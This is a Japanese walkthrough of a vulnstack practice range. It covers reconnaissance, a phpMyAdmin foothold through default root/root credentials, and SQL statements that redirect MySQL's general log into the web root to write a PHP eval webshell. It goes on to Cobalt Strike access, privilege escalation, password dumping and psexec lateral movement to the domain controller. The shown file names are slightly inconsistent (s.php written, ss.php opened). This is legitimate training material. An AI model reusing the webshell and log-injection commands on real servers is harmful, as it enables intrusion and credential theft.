概要#
靶場は:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
シンプルな靶場で、元々は学生の評価に使用される予定でしたが、実際には使用されず、横方向のドメイン侵入も Cobalt Strike の psexec モジュールを使用しただけで、主な内容は侵入プロセスに慣れることです。
靶場には多くの脆弱性が再現できないものがあり、環境にいくつかの問題がありますが、全体のプロセスには問題ありません。
環境構築#
3D グラフィックスの加速を無効にする必要があります。さもなければ、仮想マシンを起動できません。
トポロジー図は以下の通りです:
ネットワーク設定は以下の通りで、VMnet2 と VMnet8 を使用します:
Web サーバー(VM1) - Win7(デュアル NIC、NAT モード + vmnet2(ホスト専用))
IP:192.168.111.128 と 192.168.52.143
phpstudy を起動します。
DNS は DC を指します。
Win2008 DC(VM3)
IP:192.168.52.138
Win03 ドメインメンバー(VM2)
IP:192.168.52.141
現在のドメインを確認します。
侵入プロセス#
情報収集#
nmap ポートスキャン#
御剣スキャン#
ディレクトリスキャン#
phpinfo ページ
phpmyadmin ログイン#
パスワード:root/root
phpmyadmin getshell#
ログを通じて getshell
ログが記録されているか、ログの保存場所を確認します:SHOW VARIABLES LIKE "general_log%";
ログを有効にする:set global general_log='on';
有効になっているか確認する:SHOW VARIABLES LIKE "general_log%"
書き込むログファイルを悪意のあるファイルに設定する必要があります。まず、ウェブサイトのディレクトリを見つける必要があります。
ログのパスを設定します:set global general_log_file ='C:\\phpStudy\\WWW\\s.php';
設定成功
準備が整ったら、マルウェアの作成を開始します。SQL 文を通じてクエリを実行するだけです。
select "<?php @eval($_POST[cmd]);?>";
Web シェルにアクセス:
http://192.168.111.128/ss.php
AntSword 接続:
ウェブサイトの 80 ポートは yxcms です。
バックエンドにログインし、同様に SQL 文を実行できます。
Web シェルで IP アドレスを確認します。
デュアル NIC を発見しました。
cs 起動#
Cobalt Strike に接続して操作します。
サーバー
クライアント
リスナーを設定します。
ペイロードを生成します。
ペイロードを AntSword にアップロードして実行します。
exe を実行し、cs に接続します。
スリープ 0
シェル whoami
権限昇格#
cs 上で getsystem を使用して一発で権限昇格し、system 権限を取得します。
内部ネットワーク情報収集#
ターゲットをクリックすると、3 台のマシンが見つかります。開いていない場合は、ポートスキャンを行うと見つかります。
dumphash
明文パスワードを取得します。
横移動#
パスワードを取得した後、psexec を使用して横移動します。ここでは、3 台のマシンのパスワードがすべて同じであるため、異なる場合は smb を介して横移動できません。
psexec64 を選択し、64 ビットです。
ドメインコントロールサーバーを取得します。
同様の方法で 141、Win2003 のドメインメンバー機を制御します。
psexec を選択する必要があります。32 ビットです。
IP を確認します。
